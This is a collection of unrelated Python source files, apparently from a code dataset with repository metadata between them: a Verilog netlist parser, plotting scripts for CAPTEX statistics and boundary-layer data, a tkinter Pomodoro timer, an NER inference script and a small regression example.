    def reconnect(self, signal_translation = {}, parameter_translation = {}, parent = None, prefix = ''):
        """Rebuild this instantiation with its connection expressions
        rewritten: ports map through *signal_translation*, parameters
        through *parameter_translation*, and any other identifier gets
        *prefix* prepended.

        NOTE(review): the ``{}`` defaults are mutable default arguments;
        harmless here because they are only read, but fragile.
        """
        def translate_signals(m):
            token = m.group(1);
            if(token in signal_translation):
                return signal_translation[token];
            elif(token in parameter_translation):
                return parameter_translation[token];
            else:
                return prefix + token;
        def translate_named_connection(m):
            s = '\n .' + m.group(1) + '(';
            s += name_re.sub(translate_signals, m.group(2)) + ')'
            return s;
        s = self.ref_name;
        if(self.params != None):
            s += named_connection_re.sub(translate_named_connection, self.params);
        s += ' ' + prefix + self.name + '('; # instance name (now with prefix)
        if(self.connections != None):
            s += named_connection_re.sub(translate_named_connection, self.connections);
        s += ')'
        # Keep the same module as the parent of this instance.
        newinst = instance_declaration(src = s, ref = self.ref,
                                       parent = parent, name = prefix + self.name);
        return newinst;
    def get_resolved_parameters(self):
        """Defaults from the referenced module, overridden by this
        instance's "#( .name(value) )" overrides; values kept as strings."""
        param_translations = {};
        for p in self.ref.parameters:
            param_translations[p] = '%s' % self.ref.parameters[p];
        if(self.params != None):
            pl = named_connection_re.findall(self.params);
            for p,r in pl:
                param_translations[p] = '%s' % r;
        return param_translations;
    def get_dissolved_content(self, prefix):
        """Return (new_wires, new_insts) ready to be hoisted into the
        parent when this instance is dissolved; names get *prefix*."""
        if(self.ref == None):
            return None;
        my_params = self.get_resolved_parameters();
        """ Return a list of connected ports """
        p = self.get_port_connections_strings();
        my_ports = {};
        for u in p:
            my_ports[u[0]] = "%s" % u[1];
        new_wires = {};
        for w in self.ref.wires:
            # Wires wired to a port survive as the parent's signal; only
            # purely-internal wires need hoisting.
            if(not w in my_ports):
                wi = self.ref.wires[w].renamed(prefix + w);
                wi.translate_parameters(my_params);
                new_wires[prefix + w] = wi;
        new_insts = {};
        for sb in self.ref.instances:
            working_inst = self.ref.instances[sb].reconnect(
                parent = self.parent,
                signal_translation = my_ports,
                parameter_translation = my_params,
                prefix = prefix
            );
            new_insts[prefix + '_' + sb] = working_inst;
            sw = str(working_inst);
        return new_wires, new_insts;
class chiplet_declaration(module_declaration):
    """A module built programmatically (not parsed) that will absorb
    instances moved out of *parent*; see module_declaration.move_to_chiplet."""
    def __init__(self, name, parent):
        # Deliberately does NOT call module_declaration.__init__: there is
        # no source text to parse, so the fields are created empty.
        self.ports = [];
        self.name = name;
        self.parent = parent;
        self.inputs = {};
        self.outputs = {}
        self.inouts = {};
        self.wires = {};
        self.sub_blocks = {};
        self.instances = {};
        self.parameters = {};
        self.body_changed = True;
        self.num_instances = 0;
    def include_instance(self, inst):
        """
        Insert an instance int the current chiplet,
        update it's interface, and resolve conflicts
        regarding port directions.
        """
        i, o, io = inst.get_connections();
        params = inst.get_parameter_connections_strings();
        """ process instance connections """
        for u in i:
            self.inputs[u] = i[u];
        for u in o:
            self.outputs[u] = o[u];
        for u in io:
            self.inouts[u] = io[u];
        for u in params:
            for v in name_re.findall(u[1]):
                self.parameters[v] = '0'; # this must be overloaded
        """ Resolve conflicting port directions """
        # NOTE(review): Python-2 idiom -- deleting while iterating
        # dict.keys() only works when keys() is a list (Python 2);
        # on Python 3 this raises RuntimeError when a deletion occurs.
        for u in self.inputs.keys():
            if((u in self.outputs) or (u in self.inouts)):
                del self.inputs[u];
        for u in self.outputs.keys():
            if(u in self.inouts):
                del self.outputs[u];
        # If some symbol used in port connections is a parameter
        # pass it as a parameter, not as an input or output.
        for plist in (i, o, io):
            for p in plist:
                if(p in self.parent.parameters):
                    del plist[p];
                    self.parameters[p] = 0;
                else:
                    # Parameters used to declare signals used in the instances.
                    for par in name_re.findall(plist[p]._range):
                        self.parameters[par] = 0;
        """ Update port list """
        # NOTE(review): dict.keys() ``+`` concatenation is Python-2-only.
        self.ports = self.inputs.keys() + self.outputs.keys() + self.inouts.keys();
        """ Place instance inside the chiplet """
        self.sub_blocks[inst.name] = inst;
        self.instances[inst.name] = inst;
    def get_instanciation(self, parent, name):
        """Build the instance_declaration that instantiates this chiplet
        inside *parent*, passing every port/parameter straight through."""
        s = self.name + ' '
        if(len(self.parameters) != 0):
            s += "#(" + (',\n '.join(['.%s(%s)' % (p,p) for p in self.parameters])) + '\n)';
        s += name + '(\n ';
        s += ',\n '.join(['.%s(%s)' % (p, p) for p in self.ports]);
        s += '\n)';
        si = instance_declaration(src = s, ref = self, parent = parent, name = name)
        return si;
class structural_parser:
    """Top-level driver: parse Verilog files into module_declaration
    objects, link instances to their modules, and write HDL back out."""
    def __init__(self, fname = None, no_link = False):
        self.modules_by_name = {};
        self.modules_by_file = {};
        # Names of instantiated modules with no known declaration.
        self.unresolved = set();
        self.modules = [];
        if(fname == None):
            return; # supported for python2.7
        # self.modules_by_name = {m.name: m for m in self.modules};
        self.parse_file(fname);
        if(not no_link):
            self.link();
    def parse_file(self, fname):
        """Parse every module in *fname* and register it by name/file."""
        fh = open(fname);
        # Drop comments before running the module regex.
        fs = comments.sub("", fh.read());
        fh.close();
        tmodules = [module_declaration(s, fname) for s in module_re.findall(fs)];
        self.modules_by_file[fname] = tmodules;
        for m in tmodules:
            self.modules_by_name[m.name] = m;
            """ If the HDL was linked with unresolved
            modules, then a file defining a module that was unresolved
            is loaded, remove it from the list of unresolved.
            however its references will be resolved only after
            calling the link method. """
            self.unresolved.discard(m.name)
        self.modules += tmodules;
    def save_hdl_file(self, fname):
        """Rewrite *fname* from its (possibly edited) modules; clears the
        body_changed flag so unchanged modules echo verbatim afterwards."""
        if(fname in self.modules_by_file):
            fh = open(fname, "w");
            for m in self.modules_by_file[fname]:
                fh.write(str(m));
                m.body_changed = False;
            fh.close();
    def write_stub(self, fname):
        """Write all modules as stubs (instances of unknown modules dropped)."""
        fh = open(fname, "w");
        for m in self.modules:
            fh.write(m.stub());
        fh.close();
    def write_hdl(self, fname):
        """Write all parsed modules, in load order, to a single file."""
        fh = open(fname, "w");
        for m in self.modules:
            fh.write(str(m));
        fh.close();
    def link(self):
        """ when the modules were parsed, the list of available
        modules was not available, now we are able to parse
        instances and associate each instance with the corresponding
        module declaration """
        for m in self.modules:
            m.link(self.modules_by_name);
            for u in m.instances:
                if(not u in m.sub_blocks):
                    """ Keep a set of unresolved modules """
                    self.unresolved.add(u);
|
[
"[email protected]"
] | |
ddffbaff4759c5ede7ce9da994b1bf6934ba88ea
|
05ebbebf973feb97c4a4a2f36ae84527d41cac26
|
/plot_cap.py
|
1e610517385e48d9f901ff05e51b52b488cdf9d3
|
[] |
no_license
|
noaa-oar-arl/hysplit_gmm
|
4a3b24870fbdcb224f530bb13b6810d7bb068f56
|
a71cf17e91c44efb8a64c67d12ce2fa36b7ccf79
|
refs/heads/master
| 2023-02-05T10:20:07.258913 | 2020-12-18T16:15:40 | 2020-12-18T16:15:40 | 300,342,332 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,393 |
py
|
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
def readstat(fname):
    """Parse one statmain output file.

    Each recognized line starts with a numeric value followed by a
    describing phrase; the value is collected under a short key.
    'Average bias' is stored squared.

    fname : str
    Returns : dict mapping statistic name -> float
    """
    stats = {}
    # (substring marker, output key, value transform) in original check order.
    extractors = (
        ("Correlation coefficient", "R", lambda v: v),
        ("Average bias", "bias", lambda v: v ** 2),
        ("Fractional bias", "FB", lambda v: v),
        ("Fig of merit", "FMS", lambda v: v),
        ("Kolmogorov", "KSP", lambda v: v),
        ("rank", "rank", lambda v: v),
        ("Root mean", "RMSE", lambda v: v),
    )
    with open(fname, "r", encoding="ISO-8859-1") as handle:
        for line in handle:
            for marker, key, transform in extractors:
                if marker in line:
                    stats[key] = transform(float(line.split()[0]))
    return stats
class MultRuns:
    """
    Plots statistics from multiple statmain output files.

    One curve is drawn per tag in *taglist*; the x axis is the CAPTEX
    experiment number (1,2,3,4,5,7) and the y axis is the chosen statistic.
    """
    def __init__(self, taglist):
        self.taglist = taglist
        # key: tag, value: dict of statistic name -> list of values
        # (one per CAPTEX experiment), collated by CapRun.
        self.fhash = {}
        self.makeflist()
        self.chash = {}        # key: tag, value: matplotlib format string
        self.lwhash = {}       # key: tag, value: line width
        self.offsethash = {}   # key: tag, value: x-axis offset for the curve

    def test(self):
        """Debug helper: show which tags this object will plot."""
        print(self.taglist)

    def makeflist(self, base='./txtfiles/NNN_statA.txt'):
        """Read one statmain file per tag and CAPTEX number.

        *base* is a filename template; the literal ``NNN`` is replaced by
        ``<tag><captex number>`` (e.g. ``TT1``).
        """
        numlist = ['1', '2', '3', '4', '5', '7']
        for tag in self.taglist:
            flist = [base.replace('NNN', tag + num) for num in numlist]
            caprun = CapRun(flist)
            self.fhash[tag] = caprun.getvalues()

    def add_color(self, tag, clr):
        """Assign matplotlib format string *clr* to *tag*.

        BUG FIX: the original signature was ``add_color(tag, clr)`` --
        missing ``self`` -- so any call on an instance raised TypeError.
        """
        self.chash[tag] = clr

    def plot(self, statkey, figname=None):
        """Plot statistic *statkey* for every tag; optionally save to *figname*.

        Recognized keys get a normalized transform before plotting:
        'FB rank' -> 1-|FB/2|, 'R' -> R**2, 'KSP rank' -> 1-KSP/100,
        'FMS' -> FMS/100; any other key is plotted untransformed.
        """
        sns.set()
        sns.set_style('white')
        for tag in self.taglist:
            ## These are from cdump.
            ## VV is from captexV directory: 5000 particles,
            ##    0.25x0.25 and 100m in vertical.
            ## UU is from captexG directory (higher resolution grid):
            ##    50,000 particles, 0.1x0.1 and 100m in vertical.
            ## TT is from captexNew directory (control run).
            if tag in self.chash:
                marker = self.chash[tag]
            elif tag == 'TT':
                marker = '-ks'
            elif tag == 'UU':
                marker = '--k.'
            elif tag == 'VV':
                marker = '-k.'
            else:
                marker = '-b.'
            # Line width / offset come only from the per-tag tables (the
            # original's per-marker ``lw`` assignments were dead code --
            # they were always overwritten by this lookup).
            lw = self.lwhash.get(tag, 1)
            offset = self.offsethash.get(tag, 0)
            title = statkey
            xval = np.array([1, 2, 3, 4, 5, 7]) + offset
            if statkey == 'FB rank':
                yval = 1 - np.abs(np.array(self.fhash[tag]['FB']) / 2)
                title = '1-|FB/2|'
            elif statkey == 'R':
                yval = np.array(self.fhash[tag][statkey]) ** 2
                title = '$R^2$'
            elif statkey == 'KSP rank':
                yval = 1 - np.array(self.fhash[tag]['KSP']) / 100
                title = '1- KSP/100'
            elif statkey == 'FMS':
                yval = np.array(self.fhash[tag]['FMS']) / 100
                title = 'FMS/100'
            else:
                yval = self.fhash[tag][statkey]
            # BUG FIX: kwarg changed from ``LineWidth`` to ``linewidth`` --
            # matplotlib keyword arguments are case-sensitive.
            plt.plot(xval, yval, marker, linewidth=lw, label=tag)
        ax = plt.gca()
        ax.set_ylabel(title)
        ax.set_xlabel('CAPTEX number')
        ax.yaxis.grid(True)
        if figname:
            plt.savefig(figname)
class CapRun:
    """Collates statistics from a list of statmain output files.

    ``fhash`` maps each statistic name to the list of values found, one
    per file, in file order.
    """
    def __init__(self, flist):
        self.flist = flist
        self.fhash = {}

    def getvalues(self):
        """Read every file in ``flist`` and return the collated ``fhash``."""
        for fname in self.flist:
            stats = readstat(fname)
            for key, value in stats.items():
                self.fhash.setdefault(key, []).append(value)
        return self.fhash
|
[
"[email protected]"
] | |
9b9d7095b47314c16a5bb2eb07d9b53a29be7d85
|
e7d464c201a195cb8cbe277d9bb329955f9c6c8a
|
/main.py
|
00e776fab18a8ed59bc5268af85e6720f651b79f
|
[] |
no_license
|
OmarSadigli/Pomodoro-Timer-
|
2548f3c82b96205fa70567ace32a6534c64a399d
|
f613a8fd5a17e07504b0040399c60b333f9634c6
|
refs/heads/main
| 2023-03-06T03:08:49.210071 | 2021-02-15T10:05:53 | 2021-02-15T10:05:53 | 339,034,949 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,629 |
py
|
from tkinter import *
import math
# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25          # minutes of work per pomodoro
SHORT_BREAK_MIN = 5    # minutes of break after each work session
LONG_BREAK_MIN = 20    # minutes of break after every 4th work session
reps = 0               # count of started work/break phases
timer = None           # id of the pending window.after() callback
# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
    """Cancel the running countdown and restore the initial UI state."""
    global reps
    window.after_cancel(timer)
    canvas.itemconfig(timer_text, text="00:00")
    timer_label.config(text="Timer", fg=GREEN)
    check_marks.config(text="", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
    reps = 0
# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
    """Start the next phase: work, short break, or (every 8th rep) long break."""
    global reps
    work_sec = WORK_MIN * 60
    short_break_sec = SHORT_BREAK_MIN * 60
    long_break_sec = LONG_BREAK_MIN * 60
    reps += 1
    if reps % 8 == 0:
        # Every 4th completed work session earns the long break.
        timer_label.config(text="Break", fg=RED)
        count_down(long_break_sec)
    elif reps % 2 == 0:
        # Even reps are short breaks.
        timer_label.config(text="Break", fg=PINK)
        count_down(short_break_sec)
    else:
        # Odd reps are work sessions.
        timer_label.config(text="Work")
        count_down(work_sec)
# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
def count_down(count):
    """Display *count* seconds as MM:SS and tick down once per second.

    At zero the next phase starts and one check mark is drawn per
    completed work session (reps // 2).
    """
    count_min = math.floor(count / 60)
    count_sec = count % 60
    if count_sec < 10:
        # Zero-pad the seconds field (rebinds count_sec to a string).
        count_sec = f"0{count_sec}"
    canvas.itemconfig(timer_text, text=f"{count_min}:{count_sec}")
    if count > 0:
        global timer
        # Re-arm this callback in one second with the decremented count.
        timer = window.after(1000, count_down, count - 1)
    else:
        start_timer()
        marks = ""
        for _ in range(math.floor(reps / 2)):
            marks += "✔"
        check_marks.config(text=marks)
# ---------------------------- UI SETUP ------------------------------- #
window = Tk()
window.title("Pomodoro")
window.config(padx=100, pady=50, bg=YELLOW)
canvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
tomato_img = PhotoImage(file="tomato.png")
canvas.create_image(100, 112, image=tomato_img)
timer_text = canvas.create_text(100, 130, text="00:00", fill="white", font=(FONT_NAME, 35, "bold"))
canvas.grid(column=1, row=1)
timer_label = Label(text="Timer", font=(FONT_NAME, 40, "bold"), fg=GREEN, bg=YELLOW)
timer_label.grid(column=1, row=0)
start_button = Button(text="Start", highlightthickness=0, command=start_timer)
start_button.grid(column=0, row=2)
reset_button = Button(text="Reset", highlightthickness=0, command=reset_timer)
reset_button.grid(column=2, row=2)
check_marks = Label(fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
check_marks.grid(column=1, row=3)
window.mainloop()
|
[
"[email protected]"
] | |
be9cf6de41337a706ff9fa46d7816b99d1f552a0
|
b306aab9dcea2dd83dda700bc9f7b9f1a32cff3a
|
/CAIL2021/slsb/main.py
|
f67c06674df00f1d0948662b5528d9c5174dd6c3
|
[
"Apache-2.0"
] |
permissive
|
Tulpen/CAIL
|
d6ca9981c7ea2603ae61675ba330a9614cd9398d
|
c4cfa98ab4ecedbce34a7a5a186830486047540c
|
refs/heads/master
| 2023-04-23T20:07:56.774530 | 2021-04-16T13:18:36 | 2021-04-16T13:18:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,066 |
py
|
"""Test model for SMP-CAIL2020-Argmine.
Author: Tsinghuaboy [email protected]
Usage:
python main.py --model_config 'config/bert_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'bert-submission-test-1.csv'
python main.py --model_config 'config/rnn_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'rnn-submission-test-1.csv'
"""
import argparse
import itertools
import json
import os
import re
from types import SimpleNamespace
import fire
import pandas as pd
import torch
from torch.utils.data import DataLoader
from data import Data
from evaluate import evaluate, handy_tool, calculate_accuracy_f1
from model import RnnForSentencePairClassification, BertYForClassification, NERNet,NERWNet
from utils import load_torch_model
# Label inventory kept for reference (not referenced directly in this script).
LABELS = ['1', '2', '3', '4', '5']
# Maps the config ``model_type`` string to the model class to instantiate.
MODEL_MAP = {
    'bert': BertYForClassification,
    'rnn': NERNet,
    'rnnkv': NERWNet
}
# Entity type codes, indexed by ``(tag - 1) // 3`` in result_to_json.
all_types = ['LAK', 'OTH', 'HYD', 'ORG', 'LOC', 'RIV', 'RES', 'TER', 'DAM', 'PER']
def result_to_json(string, tags):
    """Decode a per-character tag sequence into an entity dict.

    Args:
        string: iterable of characters/tokens.
        tags: parallel iterable of integer tags. Tag 0 marks a lone
            character (type 's'); for tag > 0 the arithmetic below implies
            ``tag % 3`` encodes position (1=begin, 2=inside, 0=end) and
            ``(tag - 1) // 3`` indexes ``all_types`` -- confirm against
            the label scheme used in training.

    Returns:
        ``{"string": ..., "entities": [{"word", "start", "end", "type"}, ...]}``
    """
    item = {"string": string, "entities": []}
    entity_name = ""
    entity_start = 0
    idx = 0
    i = -1
    zipped = zip(string, tags)
    listzip = list(zipped)
    last = len(listzip)
    for char, tag in listzip:
        i += 1
        if tag == 0:
            # Free-standing character, emitted with type 's'.
            item["entities"].append({"word": char, "start": idx, "end": idx+1, "type":'s'})
        elif (tag % 3) == 1:
            # Begin tag: start accumulating a new entity.
            entity_name += char
            entity_start = idx
        elif (tag % 3) == 2:
            type_index = (tag-1) // 3
            if (entity_name != "") and (i == last):
                # NOTE(review): ``i == last`` can never hold (i stops at
                # last-1), so an entity that ends at the final character on
                # an inside-tag is silently dropped -- confirm intent.
                entity_name += char
                item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
                entity_name = ""
            else:
                entity_name += char
        elif (tag % 3)+3 == 3:
            # End tag (tag % 3 == 0 with tag != 0): close and emit the entity.
            type_index = (tag-1) // 3
            entity_name += char
            item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
            entity_name = ""
        else:
            # Unreachable for integer tags (all residues are covered above).
            entity_name = ""
            entity_start = idx
        idx += 1
    return item
def remove(text):
    """Delete ASCII and full-width punctuation/special characters from *text*."""
    punctuation_class = r"[ !#\$%&'\(\)*\+,-./:;<=>?@\^_`{|}~“”?!【】()、’‘…¥·]*"
    return re.sub(punctuation_class, '', text)
def main(out_file='output/result.json',
         model_config='config/rnn_config.json'):
    """Run the configured NER model over the test set and write entities.

    Args:
        out_file: path of the JSON result file to write.
        model_config: JSON config file; loaded into a SimpleNamespace, so
            keys become attributes (model_path, model_type, test_file_path,
            max_seq_len, batch_size, ...).
    """
    # 0. Load config
    with open(model_config) as fin:
        config = json.load(fin, object_hook=lambda d: SimpleNamespace(**d))
    if torch.cuda.is_available():
        device = torch.device('cuda')
        # device = torch.device('cpu')
    else:
        device = torch.device('cpu')
    #0. preprocess file
    # id_list = []
    # with open(in_file, 'r', encoding='utf-8') as fin:
    #     for line in fin:
    #         sents = json.loads(line.strip())
    #         id = sents['id']
    #         id_list.append(id)
    # id_dict = dict(zip(range(len(id_list), id_list)))
    # 1. Load data
    data = Data(vocab_file=os.path.join(config.model_path, 'vocab.txt'),
                max_seq_len=config.max_seq_len,
                model_type=config.model_type, config=config)
    test_set, sc_list, label_list = data.load_file(config.test_file_path, train=False)
    # Recover the token text for every encoded sequence.
    token_list = []
    for line in sc_list:
        tokens = data.tokenizer.convert_ids_to_tokens(line)
        token_list.append(tokens)
    data_loader_test = DataLoader(
        test_set, batch_size=config.batch_size, shuffle=False)
    # 2. Load model
    model = MODEL_MAP[config.model_type](config)
    model = load_torch_model(
        model, model_path=os.path.join(config.model_path, 'model.bin'))
    model.to(device)
    # 3. Evaluate
    answer_list, length_list = evaluate(model, data_loader_test, device, isTest=True)

    def flatten(ll):
        # Flatten one level of nesting; kept for the commented scoring code.
        return list(itertools.chain(*ll))
    # train_answers = handy_tool(label_list, length_list) #gold
    # #answer_list = handy_tool(answer_list, length_list) #prediction
    # train_answers = flatten(train_answers)
    # train_predictions = flatten(answer_list)
    #
    # train_acc, train_f1 = calculate_accuracy_f1(
    #     train_answers, train_predictions)
    # print(train_acc, train_f1)
    test_json = json.load(open(config.test_file_path, 'r', encoding='utf-8'))
    id_list = [item['id'] for item in test_json]
    # Trim each token sequence to its true length, then decode tags.
    mod_tokens_list = handy_tool(token_list, length_list)
    result = [result_to_json(t, s) for t,s in zip(mod_tokens_list, answer_list)]
    # 4. Write answers to file
    with open(out_file, 'w', encoding='utf8') as fout:
        result_list = []
        for id, item in zip(id_list,result):
            entities = item['entities']
            # Keep real entities only ('s' marks single characters) and
            # de-duplicate while preserving first-seen order.
            words = [d['word']+"-"+d['type'] for d in entities if d['type'] !='s']
            unique_words = []
            for w in words:
                if w not in unique_words:
                    unique_words.append(w)
            item = {}
            item['id'] = id
            item['entities'] = unique_words
            result_list.append(item)
        json.dump(result_list,fout,ensure_ascii=False, indent=4)
        #fout.write(" ".join(words) + "\n")
    # para_list = pd.read_csv(temp_file)['para'].to_list()
    # summary_dict = dict(zip(id_dict.values(), [""] * len(id_dict)))
    #
    # result = zip(para_list, token_list)
    # for id, summary in result:
    #     summary_dict[id_dict[id]] += remove(summary).replace(" ","")
    #
    # with open(out_file, 'w', encoding='utf8') as fout:
    #     for id, sumamry in summary_dict.items():
    #         fout.write(json.dumps({'id':id,'summary':sumamry}, ensure_ascii=False) + '\n')
if __name__ == '__main__':
fire.Fire(main)
|
[
"[email protected]"
] | |
de94817af1da26dc86379aaeed8e0352d2b54a29
|
89d674ef6ea9f6cceb7c58dda8da524b8b2aa944
|
/flaskblog/main/routes.py
|
b2b67c9bf7673099a9f427859a670da435383448
|
[] |
no_license
|
vinodhrathanam/flashblog
|
004ceb19e8fe8611f9acf336ee210a40615a987a
|
b5ae533d36bcb64414c79adfa0e3b30e90b145bc
|
refs/heads/master
| 2020-05-09T14:32:44.173794 | 2019-04-13T16:25:32 | 2019-04-13T16:25:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 455 |
py
|
from flask import render_template, request, Blueprint
from flaskblog.models import Post
main = Blueprint('main',__name__)
@main.route('/')
@main.route('/home')
def home():
page = request.args.get('page',1,type=int)
posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)
return render_template('home.html',posts=posts)
@main.route('/about')
def about():
return render_template('about.html',title='About')
|
[
"[email protected]"
] | |
d226826efc7925a38771ffa80e803b71f8684253
|
288a00d2ab34cba6c389b8c2444455aee55a8a95
|
/tests/test_overwrites.py
|
6be0434f5d59a65c73dba6e837e5662c22636de7
|
[
"BSD-2-Clause"
] |
permissive
|
JohannesBuchner/pystrict3
|
ffd77b7bbc378bd4d8f21b5c6bd69a0d64a52ddb
|
18b0dd369082422f9bf0f89c72e7acb53a49849c
|
refs/heads/master
| 2023-08-14T06:37:37.954880 | 2023-07-13T11:16:38 | 2023-07-13T11:16:38 | 268,571,175 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 406 |
py
|
import ast
from hypothesis import given
from hypothesis.strategies import text
from pystrict3lib import assert_unknown, preknown
def test_assert_unknown():
node = ast.parse("print('hello world')").body[0]
known = {}
assert_unknown("name", known, node, "filename")
def test_assert_known():
node = ast.parse("print('hello world')").body[0]
known = {}
assert_unknown("name", known, node, "filename")
|
[
"[email protected]"
] | |
d7d3b5dd82cf367f319361397028ffae52993332
|
29903a2ef2dce59ecf1c680bb7096cbe5f36a43f
|
/BL_plot.py
|
7a7ccb5918c8513bdc0801e001a99585ce4b95a4
|
[] |
no_license
|
mkindree/Python_Code
|
1af4e5e05166f3ba55052330983ef08103e30b91
|
6ae03b570085bb8c1b73fbe226806fa6914a0f38
|
refs/heads/master
| 2021-03-30T20:46:48.128659 | 2018-03-13T18:26:24 | 2018-03-13T18:26:24 | 125,081,882 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,811 |
py
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
#%%
# These options make the figure text match the default LaTex font
plt.rc('text', usetex=True)
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern'], 'size': 10})
#%% Boundary Layer data from spreadsheet
y = np.array([0.57, 0.60, 0.70, 0.80, 0.90, 1.00, 1.10, 1.20, 1.30, 1.40, 1.50,
1.70, 1.90, 2.10, 2.30, 2.50, 2.70, 2.90, 3.10, 3.30, 3.50, 4.50])
delta = 2.67
U = np.array([5.1378, 5.4314, 6.1356, 6.8619, 7.4792, 8.1326, 8.6573, 9.2868,
10.0035, 10.4333, 11.2046, 12.0477, 12.9027, 13.1515, 13.6101,
13.7471, 13.8719, 13.9032, 13.9653, 13.9828, 13.9917, 14.0058])
U_rms = np.array([0.409, 0.4041, 0.3921, 0.4099, 0.3921, 0.4301, 0.4502, 0.4146,
0.4393, 0.3442, 0.4229, 0.3521, 0.2876, 0.26, 0.1927, 0.1878,
0.1731, 0.1756, 0.1641, 0.1603, 0.164, 0.1644])
U_inf = 14.01
eta = np.array([0, 0.2, 0.4, 0.6, 0.8, 1, 1.2, 1.4, 1.6, 1.8, 2, 2.2, 2.4, 2.6,
2.8, 3, 3.2, 3.4, 3.6, 3.8, 4, 4.2, 4.4, 4.6, 4.8, 5])
eta_delta = 4.9
f_prime = np.array([0, 0.06641, 0.13277, 0.19894, 0.26471, 0.32979, 0.39378,
0.45627, 0.51676, 0.57477, 0.62977, 0.68132, 0.72899,
0.77246, 0.81152, 0.84605, 0.87609, 0.90177, 0.92333,
0.94112, 0.95552, 0.96696, 0.97587, 0.98269, 0.98779,
0.99155])
#%% Boundary Layer figure
PUBdir = r'D:\EXF Paper\EXF Paper V3\figs'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.eps'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
ax1.plot(eta/eta_delta, f_prime, 'k')
ax2 = ax1.twinx()
ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
xy1 = (0, 0.9)
xytext1 = (0.4, 0.9)
ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
arrowprops=dict(facecolor='k', edgecolor='k'))
ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
color='b', rotation='horizontal', labelpad=14)
ax2.tick_params('y', colors='b')
xy2 = (1.75, 0.6)
xytext2 = (0.9, 0.6)
ax1.annotate('', xy=xy2, xytext=xytext2,
arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
#%%
PUBdir = r'D:\NOVA Interview'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.png'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.plot(eta/eta_delta, f_prime, 'b', zorder=0)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
plt.legend(['Blasius profile', 'LDV measurements'])
#ax2 = ax1.twinx()
#ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
#xy1 = (0, 0.9)
#xytext1 = (0.4, 0.9)
#ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
# arrowprops=dict(facecolor='k', edgecolor='k'))
#ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
# color='b', rotation='horizontal', labelpad=14)
#ax2.tick_params('y', colors='b')
#xy2 = (1.75, 0.6)
#xytext2 = (0.9, 0.6)
#ax1.annotate('', xy=xy2, xytext=xytext2,
# arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
|
[
"[email protected]"
] | |
a75cf2c5ccb67a5597a9c6f2f53b6994acad99ad
|
29db1aec3519a22f01ef01a9eac783f0609dae4c
|
/Maximumposterior.py
|
dd480e3c77425e2f40fbfc99b846d6f87bd74f80
|
[] |
no_license
|
anirudhjack/Machine-Learning
|
7ebefc52cd2326c8736fc2cb0d76ae1a7f8bde37
|
c4f58a08826cb35b51ce9b0f246b6379494e64a3
|
refs/heads/master
| 2020-05-01T11:45:31.510779 | 2019-03-24T18:24:59 | 2019-03-24T18:24:59 | 177,450,960 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 860 |
py
|
import numpy as np
print(" Enter the No of training samples")
N=int(input())
x_g=np.linspace(0,2*np.pi,N)
y=np.sin(x_g)
mean=0
std=0.05
y+=np.random.normal(mean,std,N)
import matplotlib.pyplot as plt
#creating x-matrix using vstack function i.e arrange the data row wise
x=np.vstack((np.ones(N),x_g))
print("Enter the dimension:")
p=int(input())
print("Enter the value of alpha:")
alpha=float(input())
print("Enter the value of beta:")
beta=float(input())
lam=alpha/beta
print("Maximum posterior regularized lagrange multiplier:")
print(lam)
#loop for x with dimension "d"
for i in range(2,p):
x= np.vstack((x,np.power(x_g, i)))
x_p=x
#transpose of x-matrix
x=np.transpose(x)
#calculating the weight matrix
from numpy.linalg import inv
w=np.linalg.inv(x_p@x+lam*np.identity(p))@x_p@y
print("Maximum posterior weight matrix:")
print(w)
|
[
"[email protected]"
] | |
